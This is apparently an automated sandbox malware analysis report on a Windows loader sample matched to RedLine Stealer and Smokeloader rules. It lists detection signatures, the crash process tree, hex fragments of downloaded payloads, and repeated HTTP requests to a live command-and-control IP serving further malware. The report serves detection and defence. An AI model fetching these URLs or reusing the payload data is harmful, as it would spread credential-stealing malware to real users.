Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe

Overview

General Information

Sample name:SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
Analysis ID:1528791
MD5:b1281430b4f8c39015940b1e5dc9d569
SHA1:58ba4506cdb786fc0b15d4717535e6463206f975
SHA256:dd8bd13e56f2c3c3b60e1c009caf5a3a66dce4eb59f32c4383a71a876dc0cb5a
Tags:exeGCleaner
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe (PID: 3152 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe" MD5: B1281430B4F8C39015940B1E5DC9D569)
    • WerFault.exe (PID: 2656 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 740 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6328 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7068 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 776 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2708 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 788 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1188 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 924 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7068 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1016 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4908 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1284 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5264 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1508 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1464 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1540 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2953574713.00000000007AA000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x1118:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for domain / URL
Source: http://80.66.75.114/dll/keyVirustotal: Detection: 18%Perma Link
Source: http://80.66.75.114/files/downloaduVirustotal: Detection: 12%Perma Link
Source: http://80.66.75.114/files/downloadwVirustotal: Detection: 9%Perma Link
Source: http://80.66.75.114/files/download3Virustotal: Detection: 10%Perma Link
Source: http://80.66.75.114/soft/download9Virustotal: Detection: 15%Perma Link
Source: http://80.66.75.114/files/downloadVirustotal: Detection: 19%Perma Link
Source: http://80.66.75.114/files/download?Virustotal: Detection: 18%Perma Link
Source: http://80.66.75.114/files/download9Virustotal: Detection: 14%Perma Link
Source: http://80.66.75.114/soft/downloadEVirustotal: Detection: 16%Perma Link
Source: http://80.66.75.114/soft/downloadVirustotal: Detection: 18%Perma Link
Source: http://80.66.75.114/nameVirustotal: Detection: 19%Perma Link
Source: http://80.66.75.114/files/downloadQVirustotal: Detection: 9%Perma Link
Source: http://80.66.75.114/files/download4/files/downloadVirustotal: Detection: 8%Perma Link
Source: http://80.66.75.114/soft/downloadQVirustotal: Detection: 14%Perma Link
Source: http://80.66.75.114/files/download4/files/downloaduVirustotal: Detection: 17%Perma Link
Source: http://80.66.75.114/files/downloadEVirustotal: Detection: 8%Perma Link
Source: http://80.66.75.114/soft/download14/soft/downloadVirustotal: Detection: 14%Perma Link
Source: http://80.66.75.114/files/downloadAVirustotal: Detection: 11%Perma Link
Source: http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUBVirustotal: Detection: 18%Perma Link
Source: http://80.66.75.114/files/downloadDataVirustotal: Detection: 15%Perma Link
Source: http://80.66.75.114/dll/downloadVirustotal: Detection: 18%Perma Link
Source: http://80.66.75.114/files/downloadtem32Virustotal: Detection: 10%Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]Virustotal: Detection: 59%Perma Link
Source: C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exeReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exeVirustotal: Detection: 59%Perma Link
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeReversingLabs: Detection: 50%
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeVirustotal: Detection: 36%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_004034B0 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,0_2_004034B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_02173717 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,0_2_02173717

Compliance

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeUnpacked PE file: 0.2.SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe.400000.0.unpack
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 08 Oct 2024 08:08:38 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 08 Oct 2024 08:08:39 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=84Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: Joe Sandbox ViewIP Address: 80.66.75.114 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknownTCP traffic detected without corresponding DNS query: 80.66.75.114
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_00401840 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401840
Source: global trafficHTTP traffic detected: GET /name HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /add?substr=mixnine&s=three&sub=NOSUB HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2954051977.0000000002D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUB
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2954051977.0000000002D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUBK
